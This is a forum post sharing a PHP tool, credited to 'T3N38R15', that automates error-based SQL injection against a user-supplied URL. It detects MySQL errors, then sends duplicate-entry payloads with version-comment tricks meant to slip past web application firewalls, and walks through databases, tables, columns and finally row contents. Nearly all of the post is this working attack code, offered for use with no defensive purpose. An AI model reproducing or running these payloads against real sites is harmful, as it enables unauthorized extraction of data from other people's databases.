Jump to content
Aerosol

Auto Sqli [Error-based] + WAF Bypass

By Aerosol, in Programare

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

<?php
    @set_time_limit(0);
    if(empty($_POST)==0){
        if(empty($_POST["opt1"])==0){
            $Fd=false;
            $pb=array('1"','1' . chr(39),'1');
            $_url = $_POST["url"];
            foreach($pb as $zz){
                $_buffer = LoadSite($_url . $zz, "");
                if(preg_match("#You have an error in your SQL syntax#", $_buffer)){$Fd=true;break;}
            }
            if($Fd){
                $seperator='';
                foreach($pb as $zz){
                    $fg=$_url . $zz . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+';
                    $_buffer=LoadSite($fg,"");
                    if(preg_match("#Duplicate entry#",$_buffer)){$seperator=$zz;break;}
                }
                if($seperator==''){echo "NOTHING UP HERE";exit();}
                echo '<table><tr><td valign="top">';
                $fg=$_url . $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+hav?ing+min(0)+or+1+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                $version=$_buffer1[0];$user=$_buffer1[1];$database=$_buffer1[2];
                echo "Version : " . $version . "</br>User : " . $user . "</br>database : " . $database;
                $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                $dbcount=$_buffer1[1];
                echo '</br>DbCount : ' . $dbcount . '</br></td><td><table border="3"><tr><td>Databases : </td></tr>';
                for ($i=0;$i<$dbcount; $i++){
                    echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
                    $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                    $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                    $_buffer1 = explode('~',$lde[1]);
                    echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
                    echo '<input type="hidden" name="nameinbase" value="' . String2Hex($_buffer1[1]) . '">';
                    echo '<input type="hidden" name="url" value="' . $_url . '">';
                    echo '<input type="hidden" name="opt2" value="1">';
                    echo '<input type="hidden" name="seperator" value="';
                    switch($seperator){
                        case '1"':echo "1";break;
                        case '1' . chr(39):echo "2";break;
                        case '1':echo "3";break;
                    }
                    echo '"></form></td></tr>';
                }
                echo "</table><td></tr></table>";
            }
        }elseif(empty($_POST["opt2"])==0){
            $_url = $_POST["url"]; 
            $seperator = $_POST["seperator"]; 
            $sepe=GetSeperatorByInteger($seperator);
            $fg=$_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
            $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
            $_buffer1 = explode('~',$lde[1]);
            $cta=$_buffer1[1];
            echo '<table border="3"><tr><td>Tables From ' . Hex2String($_POST["nameinbase"]) . ' : (Total: '.$cta.') </td></tr>';
            for ($i=0;$i<$cta; $i++){
                echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
                $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
                echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
                echo '<input type="hidden" name="nameinbase2" value="' . String2Hex($_buffer1[1]) . '">';
                echo '<input type="hidden" name="url" value="' . $_url . '">';
                echo '<input type="hidden" name="opt3" value="1">';
                echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
                echo "</form></td></tr>";
            }
        }elseif(empty($_POST["opt3"])==0){
            $_url = $_POST["url"];
            $seperator = $_POST["seperator"]; 
            $sepe=GetSeperatorByInteger($seperator);
            $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
            $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
            $_buffer1 = explode('~',$lde[1]);
            $cta=$_buffer1[1];
            echo '<table border="3"><tr><td>columns from ' . Hex2String($_POST["nameinbase2"]) . ' in Database ' . Hex2String($_POST["nameinbase"]) . '  (Total: '.$cta.')</td></tr>';
            for ($i=0;$i<$cta; $i++){
                echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
                $fg=$_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'+LIMIT+'.$i.',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode("~",$lde[1]);
                echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
                echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
                echo '<input type="hidden" name="nameinbase2" value="' . $_POST["nameinbase2"] . '">';
                echo '<input type="hidden" name="nameinbase3" value="' . String2Hex($_buffer1[1]) . '">';
                echo '<input type="hidden" name="url" value="' . $_url . '">';
                echo '<input type="hidden" name="opt4" value="1">';
                echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
                echo "</form></td></tr>";
            }
            echo '</table>';
        }elseif(empty($_POST["opt4"])==0){
            $_url = $_POST["url"];
            $seperator = $_POST["seperator"]; 
            $sepe=GetSeperatorByInteger($seperator);
            $fg = $_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count('.Hex2String($_POST["nameinbase3"]).'),0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
            $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
            $_buffer1 = explode('~',$lde[1]);
            $cta=$_buffer1[1];
            echo '<table border="3"><tr><td>Items : (Total: '.$_buffer1[1].')</td></tr>';
            for ($i=0;$i<$cta; $i++){
                $fg=$_url .$sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,'.Hex2String($_POST["nameinbase3"]).',0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'+LIMIT+'.$i.',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                echo '<tr><td>' . $i . '</td><td>' . $_buffer1[1] . '</td></tr>';
            }
            echo '</table';
        }
    }else{
    ?>
<style type="text/css">#sbz {text-align: center;color: #000;font-size: 20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style>
<html>
<head><title>T3N38R15 Injector for WAF Bypass</title></head>
<body>
<b id="sbz"><font size="100"></br>T3N38R15</br></br></br>Error Based SQL Injector</br></br></br></font></b>
<form method="post">
<input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit">
<input type="hidden" name="opt1" value="1"></form>
</br>
Greets to Team M4DL33Ts
</body>
</html>
<?php
    }
function GetSeperatorByInteger($int){
    switch($seperator){
        case '1':return '1"';
        case '2':return '1' . chr(39);
        case '3':return '1';
    }
    return '';
}
function String2Hex($string){
    $hex='';
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
function Hex2String($hex){
    $string='';
    for ($i=0; $i < strlen($hex)-1; $i+=2){
        $string .= chr(hexdec($hex[$i].$hex[$i+1]));
    }
    return $string;
}
function LoadSite($url, $postdata){
    $agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0";
    $ch = curl_init($url);
    if ($ch){
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch,CURLOPT_USERAGENT, $agent);
        curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    if (isset($postdata)){
        curl_setopt($ch,CURLOPT_POST, 1);
        curl_setopt($ch,CURLOPT_POSTFIELDS, $postdata);}
        $tmp = curl_exec ($ch);
        curl_close ($ch);
    }
    return $tmp;
}
?>

Credits to : T3N38R15

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...